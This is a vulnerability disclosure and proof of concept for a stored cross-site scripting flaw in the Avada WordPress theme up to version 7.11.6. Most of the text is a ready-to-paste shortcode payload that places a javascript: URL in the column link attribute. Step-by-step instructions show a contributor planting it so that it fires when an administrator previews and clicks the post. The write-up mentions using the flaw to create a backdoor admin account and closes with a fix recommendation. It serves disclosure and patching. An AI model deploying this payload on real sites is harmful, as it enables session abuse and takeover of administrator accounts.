Exploit Author: Muhammad Zeeshan (Xib3rR4dAr)
The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Stored Cross-Site Scripting via fusion_builder_column
shortcode in versions up to, and including, 7.11.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
While creating a button, Avada allows to add attributes to a button, which can be exploited to perform XSS. By exploiting XSS attacker can perform actions on behalf of other users like create new backdoor admin account when admin views the form.
link
parameter/attribute in fusion_builder_column
shortcode can be set to contain javascript
protocol which would allow execution of custom JS when column is clicked.
link="javascript:alert('XSS')"
- Login as contributor user
- Visit http://192.168.253.1/wp-admin/post-new.php
- Enter any name for Post Title
- In editor, "Text" tab would already be selected, if not then click "Text" tab and paste:
[fusion_builder_container type="flex" hundred_percent="no" hundred_percent_height="no" hundred_percent_height_scroll="no" align_content="stretch" flex_align_items="flex-start" flex_justify_content="flex-start" flex_wrap="wrap" hundred_percent_height_center_content="yes" equal_height_columns="no" container_tag="div" hide_on_mobile="small-visibility,medium-visibility,large-visibility" status="published" border_style="solid" box_shadow_blur="0" box_shadow_spread="0" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="center center" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" fade="no" background_parallax="none" enable_mobile="no" parallax_speed="0.3" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" video_mp4="" video_webm="" video_ogv="" video_url="" video_aspect_ratio="16:9" video_loop="yes" video_mute="yes" video_preview_image="" pattern_bg="none" pattern_custom_bg="" pattern_bg_color="" pattern_bg_style="default" pattern_bg_opacity="100" pattern_bg_size="" pattern_bg_blend_mode="normal" mask_bg="none" mask_custom_bg="" mask_bg_color="" mask_bg_accent_color="" mask_bg_style="default" mask_bg_opacity="100" mask_bg_transform="left" mask_bg_blend_mode="normal" render_logics="" logics="" absolute="off" absolute_devices="small,medium,large" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_background_color="" sticky_height="" sticky_offset="" sticky_transition_offset="0" scroll_offset="0" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0"][fusion_builder_row][fusion_builder_column type="1_1" layout="1_1" align_self="auto" content_layout="column" align_content="flex-start" valign_content="flex-start" content_wrap="wrap" spacing="" center_content="no" column_tag="div" link="javascript:alert('XSS')" target="_self" link_description="" min_height="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" sticky_display="normal,sticky" class="" id="" type_medium="" type_small="" flex_grow_medium="" flex_grow_small="" flex_grow="" flex_shrink_medium="" flex_shrink_small="" flex_shrink="" order_medium="0" order_small="0" spacing_left_medium="" spacing_right_medium="" spacing_left_small="" spacing_right_small="" spacing_left="" spacing_right="" margin_top_medium="" margin_bottom_medium="" margin_top_small="" margin_bottom_small="" margin_top="" margin_bottom="" padding_top_medium="" padding_right_medium="" padding_bottom_medium="" padding_left_medium="" padding_top_small="" padding_right_small="" padding_bottom_small="" padding_left_small="" padding_top="" padding_right="" padding_bottom="" padding_left="" hover_type="none" border_sizes_top="" border_sizes_right="" border_sizes_bottom="" border_sizes_left="" border_color_hover="" hue="" saturation="" lightness="" alpha="" border_color="" border_style="solid" border_radius_top_left="" border_radius_top_right="" border_radius_bottom_right="" border_radius_bottom_left="" box_shadow="no" box_shadow_vertical="" box_shadow_horizontal="" box_shadow_blur="0" box_shadow_spread="0" box_shadow_color="" box_shadow_style="" z_index_hover="" z_index="" overflow="" background_type="single" background_color_medium="" background_color_small="" background_color_medium_hover="" background_color_small_hover="" background_color_hover="" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" background_image_id_medium="" background_image_id_small="" background_image_id="" lazy_load="none" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="left top" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" render_logics="" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_offset="" absolute="off" absolute_top="" absolute_right="" absolute_bottom="" absolute_left="" filter_type="regular" filter_hover_element="self" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" transform_type="regular" transform_hover_element="self" transform_scale_x_hover="1" transform_scale_y_hover="1" transform_translate_x_hover="0" transform_translate_y_hover="0" transform_rotate_hover="0" transform_skew_x_hover="0" transform_skew_y_hover="0" transform_scale_x="1" transform_scale_y="1" transform_translate_x="0" transform_translate_y="0" transform_rotate="0" transform_skew_x="0" transform_skew_y="0" transform_origin="" transition_duration="300" transition_easing="ease" transition_custom_easing="" motion_effects="W10=" scroll_motion_devices="small-visibility,medium-visibility,large-visibility" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" last="true" border_position="all" first="true"][fusion_pricing_table type="1" backgroundcolor="" hue="" saturation="" lightness="" alpha="" background_color_hover="" bordercolor="" dividercolor="" heading_color_style_1="" heading_color_style_2="" pricing_color="" body_text_color="" margin_top="" margin_right="" margin_bottom="" margin_left="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" class="" id="" columns="2"][fusion_pricing_column title="Standard" standout="no"][fusion_pricing_price currency="$" currency_position="left" price="15.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][fusion_pricing_column title="Premium" standout="yes"][fusion_pricing_price currency="$" currency_position="left" price="25.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][/fusion_pricing_table][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]
- Click "Submit for review"
- Logout from contributor user
- Login as administrator user
- Visit http://192.168.253.1/wp-admin/edit.php
- Click "preview" on post created by contributor user
- Clicking anywhere inside column, eg on table would trigger XSS.
Author and other users can directly publish a post having XSS in shortcode and then XSS will trigger when any visiting user visits the post and clicks inside the column.
Allow whitelisted protocols like http/https only in link
attribute of fusion_builder_column